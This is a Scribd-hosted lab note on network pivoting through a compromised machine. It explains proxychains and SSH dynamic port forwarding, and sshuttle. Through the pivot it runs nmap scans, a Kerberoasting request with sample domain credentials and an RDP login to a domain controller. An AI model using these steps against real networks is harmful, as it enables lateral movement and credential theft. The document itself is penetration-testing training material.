Scribd
Upload
114 views

Pivoting

Uploaded by

arthurquamena
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
114 views

Pivoting

Uploaded by

arthurquamena
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

Pivoting

Overview
Pivoting basically means moving from one network to another network through a
box/machine we have already compromised, a network that was previously not available to
us.
Let's say we compromise a machine with the IP 162.168.2.15 but when we open an
interface we notice the machine has another IP 162.168.10.2 which means there is another
network the machine is on.
What can do here is setup a proxy which we can pivot to get into the network.
There are several tools that can help us with this.

Lab
Proxy Chain
So, for Proxy Chains, the first thing we have to do is open the configuration file

$ cat /etc/proxychains4.conf

At the very end it shows an IP and a port number, and this is the port we are going to bind
to.
Points to note, you can always update the port number, for instance once you have a pivot
and you want to establish another pivot or if your port breaks, you can just update it.

To start with the pivoting, we use this command

$ ssh -f -N -D 9050 -i pivot root@10.0.155.5

Let's break it down:

ssh : This is the command-line utility for securely connecting to a remote server or
computer. It's widely used for logging into and executing commands on a remote
machine.
-f : This flag tells SSH to go into the background just before it executes the command.
It's often used when you want to run SSH in the background without having it take over
your terminal.
-N : This flag tells SSH not to execute any remote commands. It's used when all you
want to do is set up port forwarding, without running any commands on the remote
server.
-D 9050 : This specifies dynamic port forwarding. It tells SSH to listen on port 9050 on
the local machine and forward all traffic through the SSH connection to the remote
server. This effectively sets up a SOCKS proxy on port 9050 .
-i pivot : This specifies the identity (private key) file to use for authentication. In this
case, it's using a private key file named pivot to authenticate with the remote server.
This is typically used instead of password authentication for better security.
root@10.0.155.5 : This is the username ( root ) and hostname ( 10.0.155.5 ) of the
remote server you're connecting to. It's the server where the SSH tunnel will terminate.
Here, root is the username, and 10.0.155.5 is the IP address of the server

Once you've been able to establish ssh you can do all sorts of things using proxy chains

$ proxychains nmap -p88 10.10.10.225 - This is to scan Kerberos port 88 on the DC


$ proxychains nmap 10.10.10.225 - This is to scan for the 1st 1000 open ports
$ proxychains nmap 10.10.10.225 -sT - To run a TCP connect scan instead of SYN
scan
$ proxychains GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc -ip
10.10.10.225 -request - This is a classic Kerberos attack with proxy chains
$ proxychains xfreerdp /u:administrator /p:'Hacker321!' /v:10.10.10.225 -
We can use this to rdp into the domain controller! Amazing!
$ proxychains firefox - You can start firefox in proxy chain! Amazing!

Sshuttle
We can install this tool with

$ sudo pip install sshuttle

After installation we can initialize it with

$ sshuttle -r root@10.10.155.5 10.10.10.0/24 -ssh-cmd "ssh -i pivot"

Once we are connected to the server, we can run any command

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy